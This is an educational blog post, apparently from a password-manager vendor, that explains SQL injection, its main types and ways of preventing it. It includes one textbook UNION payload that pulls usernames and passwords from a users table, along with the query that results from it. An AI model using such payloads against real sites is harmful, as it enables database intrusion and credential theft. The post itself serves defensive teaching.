SQL Injection: How It Works and How to Prevent It

Cybersecurity Content Writer

Can hackers take control of an entire website with just a few strings of code? An SQL injection could let someone ransack your database and steal everything from administrative credentials to customer card details.

If your site or application has been left with just a few weak spots in its programming, a hacker can extract all kinds of information you never intended to be made public.

So what is an SQL injection attack, and how can you prevent it?

What is SQL?

SQL is a coding language used primarily to retrieve information from online databases. It’s easy to work with because it’s intuitive and incorporates basic English words as commands.

For example, imagine a customer is shopping online and types the word “shoes” into a store’s search bar. When they initiate the search function, a simple process begins behind the scenes.

The website will be using a database management system (DBMS) which, in turn, will run some form of SQL. When the customer searches for “shoes,” a string of code is created using that language. This is the SQL query.

That query will contain some specifications, such as where to look and what to retrieve. It should look like this:

SELECT name, description FROM products WHERE category = “shoes”

When this query reaches the database, the DBMS system will read the SQL query and know to look in the “products” table. It can then retrieve the names and descriptions of items in the “shoes” category and send that data back to the customer. If it finds ten items, it will send ten names and descriptions.

It’s a simple process. And that’s where the trouble starts.

What is SQL injection?

To carry out an injection, a hacker will try to slip additional coding into the SQL string. That’s the injection.

This doesn't always work, of course. The site's DBMS reads some characters as coding commands (SELECT, for example) and others as normal words and characters (“shoes” in this scenario).

If a site has been programmed correctly, searching for a coding command won't result in an injection. Instead, the system will read the command as a set of characters it doesn’t recognize and send back a message saying something like “no items found.”

However, if the system hasn’t been secured, it will read the injected characters as a genuine SQL command. This is where things can go wrong.

Instead of using the keyword “shoes,” the hacker could search for specific SQL commands. When the string is formed and sent to the database, the DBMS will read the searched keyword as a command and carry it out accordingly.

The damage

Using a technique called blind SQL injection, a hacker can quickly work out exactly what DBMS is being operated behind the scenes. Knowing this, they will be able to start using the appropriate SQL language.

If they search for the right coding terms, they can compel the DBMS to return a full list of all the different data tables it contains. Armed with this insight, they can access each table and extract the information they want. If they find a “user” table, they can really cause some trouble.

UNION is a coding command that allows someone to add an extra query to their main one. The results of this subquery will appear below the results of the primary query.

A hacker could write something like this in the search bar:

“shoes” UNION (SELECT username, password FROM users);--"

Behind the scenes, an SQL string would be generated, which might look like this:

SELECT name, description FROM products WHERE category = “shoes” UNION (SELECT username, password FROM users);--

Now, as well as returning the results for the keyword “shoes,” the hacker will also be able to view all usernames and passwords from the “users” table.

The passwords will probably be hashed, but it won’t take long for a hacker to crack them. If they can work out which usernames belong to the admins, they can use brute-forcing software to quickly break into the relevant account and gain administrative access to the entire application.

Types of SQL Injections

To help you fortify your defenses, we must delve into the various types of SQL injection attacks and develop a deeper understanding of this cyber threat landscape

1. Classic SQL Injection

The classic SQL injection, also known as in-band SQL injection, is the most prevalent form of this cyberattack. By slipping malicious SQL code into user input fields, bad actors gain unauthorized access to manipulate, delete, or even execute administrative commands on the affected database. It's essential to be aware of this common threat and take measures to prevent it.

2. Blind SQL Injection

Blind SQL injection attacks, as the name suggests, force attackers to work blindly, without the luxury of direct access to the database output. In most instances, attackers who engage in a blind SQL attack rely on a series of true and false queries to gather information. This way of operating allows attackers to deduce the database schema and contents, piece by piece.

3. Error-based SQL Injection

Error-based SQL injections capitalize on database error messages to reveal sensitive information. Attackers behind such attacks intentionally submit malformed SQL queries, causing the database to generate error messages that contain valuable information. By closely analyzing these messages, cybercrooks can learn about the system's inner workings and identify its (the systems’) potential weak spots.

4. Time-based Blind SQL Injection

Time-based blind SQL injections are a more specific type of blind SQL injection attack. Attackers who engage in time-based blind SQL attacks focus on the database's response time to infer information. By submitting SQL queries that cause delays in the response, they can learn specific details about the database based on the time it takes to receive a reply.

5. Out-of-band SQL Injection

Out-of-band SQL injection attacks use a separate communication channel to send and receive data, rather than the direct channel between the application and the database. This less common but potent attack method enables attackers to bypass certain security measures, such as firewalls and intrusion detection systems, to carry out their malicious objectives.

SQL injection attacks pose a variety of security threats to the affected organization. Once cybercrooks are successful in exploiting an SQL injection vulnerability, they can:

  • Add, remove, or edit contents in the database.
  • Write new files into the database.
  • Read source code of the database server.

Such access capabilities can even lead to a complete takeover of the databases and the web server, which — as you can imagine — can be disastrous.

How to prevent SQL injection

A successful SQL injection can lead to colossal problems. A hacker can steal passwords and payment information, leak user details online, and delete essential data. An event like this can irreversibly destroy consumer trust. How can you prevent it?

  • Input Validation

    If you build an input validation process into the backend coding of your site, it can go a long way towards cutting down the threat. You could create an allowlist of accepted characters, and program the DBMS to recognize if a keyword is not listed. If a hacker “searches” for a coding command, your system will check it against the allowlist. When it doesn’t get a match, it won’t run the code.

  • Prepared statements

    Creating prepared statements is probably the best strategy. A vulnerable site creates a new SQL string every time the hacker conducts a search, but with a prepared statement, that's not the case. When programming the backend of your site, create your SQL templates in advance, with a question mark in place of the keyword. The DBMS can be programmed to read that question mark as whatever data is in the search bar, but the query itself is premade. This drastically reduces the risk of a malicious SQL command reaching the database.

  • Data segregation

    The more your data is segregated, the less a hacker can seize in one attack. In the example of the online store we discussed earlier, the problem of the SQL weakness is made far worse by the fact that user data is being kept on the same database as basic product lists. Separating different kinds of information across separate databases and servers limits the amount of damage an SQL attack can cause.

  • Use the latest technologies

    Make sure to use the latest version of development tools to ensure maximum security. Older web development technologies might lack SQL protection or could have potential vulnerabilities for bad actors to exploit. Make sure to update software components that you might use for development because updates are designed to patch the bugs and potential security issues.

Subscribe to NordPass news

Get the latest news and tips from NordPass straight to your inbox.